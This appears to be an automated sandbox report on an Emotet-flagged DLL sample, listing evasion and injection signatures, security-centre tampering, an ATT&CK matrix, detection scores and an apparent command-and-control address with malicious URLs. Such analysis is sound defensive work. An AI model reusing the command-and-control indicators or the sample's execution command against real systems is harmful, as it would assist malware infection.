                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 2444Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 2572Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 2312Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: svchost.exe, 0000000F.00000002.604324253.0000029768E29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`rFn
                      Source: svchost.exe, 0000000F.00000002.604874502.000002976E465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                      Source: svchost.exe, 0000001D.00000002.622169830.0000022905CED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWFP Native MAC Layer LightWeight Filter-0000
                      Source: regsvr32.exe, 00000006.00000003.360680012.000000000052B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.360644901.0000000000501000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664157584.0000000000501000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.360723136.000000000052E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664545621.000000000052E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.604845435.000002976E452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.622169830.0000022905CED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000007.00000002.664118973.0000021406402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 0000001D.00000002.622010388.0000022905C88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@'
                      Source: regsvr32.exe, 00000006.00000003.360680012.000000000052B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.360644901.0000000000501000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.360723136.000000000052E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664545621.000000000052E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU~
                      Source: svchost.exe, 00000007.00000002.664360919.0000021406441000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.664301363.000001F55C463000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.664196837.000001DD72629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C920E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9D0B8 LoadLibraryA,GetProcAddress,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C920E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C96550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9D318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C94558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9E6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 0000000C.00000002.664261472.0000017563240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 0000000C.00000002.664310605.0000017563302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 2.2.regsvr32.exe.eb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1bf264f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.6e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1bf264f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.26c83780000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.26c83780000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.6e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.286004356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.282888482.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.665179652.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.664928171.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.284149988.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.285867469.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.284635526.000001BF264F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.284298994.0000026C83780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      111
                      Process Injection
                      21
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium11
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API
                      Boot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      LSASS Memory1
                      Query Registry
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
                      Virtualization/Sandbox Evasion
                      Security Account Manager51
                      Security Software Discovery
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection
                      NTDS3
                      Virtualization/Sandbox Evasion
                      Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories
                      LSA Secrets2
                      Process Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      Remote System Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Regsvr32
                      DCSync2
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32
                      Proc Filesystem34
                      System Information Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      File Deletion
                      Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 626488 Sample: TSvDnT6fkE.dll Startdate: 14/05/2022 Architecture: WINDOWS Score: 80 42 Antivirus detection for URL or domain 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected Emotet 2->46 7 loaddll64.exe 1 2->7         started        9 svchost.exe 2->9         started        12 svchost.exe 1 1 2->12         started        15 10 other processes 2->15 process3 dnsIp4 17 regsvr32.exe 5 7->17         started        20 cmd.exe 1 7->20         started        22 rundll32.exe 2 7->22         started        24 rundll32.exe 7->24         started        48 Changes security center settings (notifications, updates, antivirus, firewall) 9->48 26 MpCmdRun.exe 1 9->26         started        36 127.0.0.1 unknown unknown 12->36 signatures5 process6 signatures7 40 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->40 28 regsvr32.exe 17->28         started        32 rundll32.exe 2 20->32         started        34 conhost.exe 26->34         started        process8 dnsIp9 38 23.239.0.12, 443, 49768 LINODE-APLinodeLLCUS United States 28->38 50 System process connects to network (likely due to code injection or exploit) 28->50 52 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->52 signatures10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      TSvDnT6fkE.dll34%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLinkDownload
                      2.2.regsvr32.exe.eb0000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                      4.2.rundll32.exe.26c83780000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      6.2.regsvr32.exe.6e0000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      3.2.rundll32.exe.1bf264f0000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://23.239.0.12/K100%Avira URL Cloudmalware
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://23.239.0.12/0100%Avira URL Cloudmalware
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      https://23.239.0.12/0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      https://23.239.0.12/true
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000A.00000002.317636438.000001E56063E000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000A.00000002.317636438.000001E56063E000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000002.317649151.000001E56064C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000A.00000003.317186097.000001E56063A000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000A.00000003.317169399.000001E560641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317190582.000001E560642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.317643661.000001E560643000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.317619964.000001E560629000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000A.00000003.317169399.000001E560641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317190582.000001E560642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.317643661.000001E560643000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://www.hotspotshield.com/terms/svchost.exe, 0000001D.00000003.589568210.0000022906A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589718367.00000229065AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589683273.000002290659D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589628000.0000022906A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589768932.0000022906A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589743080.0000022906584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.pango.co/privacysvchost.exe, 0000001D.00000003.589568210.0000022906A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589718367.00000229065AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589683273.000002290659D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589628000.0000022906A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589768932.0000022906A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589743080.0000022906584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://ecn.dev.virtualearth.net/mapcontrol/roadshield.ashx?bucket=svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.bingmapsportal.comsvchost.exe, 0000000A.00000002.317604336.000001E560613000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.317619964.000001E560629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.317636438.000001E56063E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://23.239.0.12/Kregsvr32.exe, 00000006.00000003.360680012.000000000052B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.360644901.0000000000501000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.360723136.000000000052E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664545621.000000000052E000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001D.00000003.594537232.00000229065A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.594593800.0000022906586000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://23.239.0.12/0regsvr32.exe, 00000006.00000003.360644901.0000000000501000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664157584.0000000000501000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.317169399.000001E560641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317181225.000001E560646000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000A.00000002.317716036.000001E56066B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317124892.000001E560668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000A.00000002.317636438.000001E56063E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000002.317619964.000001E560629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.317169399.000001E560641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317181225.000001E560646000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://dev.virtualearth.net/REST/v1/Transit/Stops/svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crl.ver)svchost.exe, 0000000F.00000002.604874502.000002976E465000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.622169830.0000022905CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      low
                                                                      https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000A.00000002.317649151.000001E56064C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317169399.000001E560641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001D.00000003.598967069.0000022906A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.598863464.00000229065B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.598935520.0000022906584000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.598896455.00000229065B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.598914076.00000229065A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000002.317636438.000001E56063E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.317604336.000001E560613000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://%s.xboxlive.comsvchost.exe, 00000008.00000002.664253267.000001F55C43E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          low
                                                                          https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://support.hotspotshield.com/svchost.exe, 0000001D.00000003.589568210.0000022906A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589718367.00000229065AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589683273.000002290659D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589628000.0000022906A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589768932.0000022906A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589743080.0000022906584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
